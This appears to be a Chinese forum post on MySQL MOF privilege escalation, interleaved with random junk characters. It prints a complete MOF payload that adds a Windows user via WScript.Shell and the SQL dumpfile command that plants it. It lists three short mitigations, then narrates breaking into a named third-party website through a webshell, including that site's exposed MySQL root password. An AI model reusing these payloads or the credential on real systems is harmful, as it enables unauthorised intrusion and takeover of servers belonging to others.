Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法
0 E( n7 O. W0 r# o# ^' x; ?
网上公开的一些利用代码:
) y: Z2 `+ D' b# _2 Z
#pragma namespace(“\\\\.\\root\\subscription”)
5 F- E8 b7 B. ^& R( e
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
/ L- Q3 z, @/ ~7 o- S9 k
  G; }2 q; }( P9 _; \4 k. F

( R# J5 P  o/ T) s) K+ b  \' p% T
1 s2 h( [% l$ D8 `! `/ I
8 [6 e+ @* i# B$ D) P$ R. |连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：
- r. F# _0 Z1 A# ]5 X* I4 w- p
/ {! j+ c) _' ]7 f& Q. g' k1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

# v6 W1 G. E) R  Y' N4 V2、禁止使用”WScript.Shel”组件

3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER

0 Q0 K/ {4 f+ y当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
7 ~! S" A8 O* c/ ]3 `. T  P9 U
5 X  s5 C2 [) X% M# i, d事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
4 p. L  a  c+ F$ o8 m+ u* X0 t
: M# Y7 B8 S  x  t/ z' Y: X4 s& k但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容

看懂了后就开始练手吧
7 d4 Z) W. o4 j; h4 u% T+ w
http://www.webbmw.com/config/config_ucenter.php 一句话 a
; V* e9 n6 [% O0 @. x' ]
' l2 m! T" `2 P) J$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。

* Z/ P1 u# `  }$ k于是直接用菜刀开搞
( e9 }+ a3 @, k2 B2 r+ t: |' l
上马先
( m3 }3 J/ U$ d
既然有了那些账号 之类的 于是我们就执行吧…….
$ M& }$ Z" W5 R! g( F6 ]  n
小小的说下

在这里第1次执行未成功        原因未知
/ C1 q# O4 B& r3 c" A- j& t. c
( I2 t6 h4 P) {8 m( X; D我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
  C% w& M8 X: ~7 y" d$ Z
: m$ E% Y. h8 R* l1 r#pragma namespace(“\\\\.\\root\\subscription”)
+ p  B0 V& r& Q, q& R/ X
instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

我是将文件放到C:\WINDOWS\temp\1.mof

所以我们就改下执行的代码
# X8 c6 n; s! `8 Z: t3 g
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;


: \" @/ t+ f& e5 X& Y" d0 t. |& {5 z( B
但是 你会发现账号还是没有躺在那里。。

于是我就感觉蛋疼
2 X  t3 U5 Y# ]& S' D
就去一个一个去执行 但是执行到第2个 mysql时就成功了………

# x- K, T- L$ D* q
# {7 D3 B) X9 h* ?
* X* X, j8 X4 i% v6 b' g但是其他库均不成功…

* C1 I3 {+ g% Y* g* [7 ?& F我就很费解呀 到底为什么不成功求大牛解答…
8 V9 S" S2 ^- Y9 s: ]3 x
/ h5 z4 N" n3 Y. f4 z​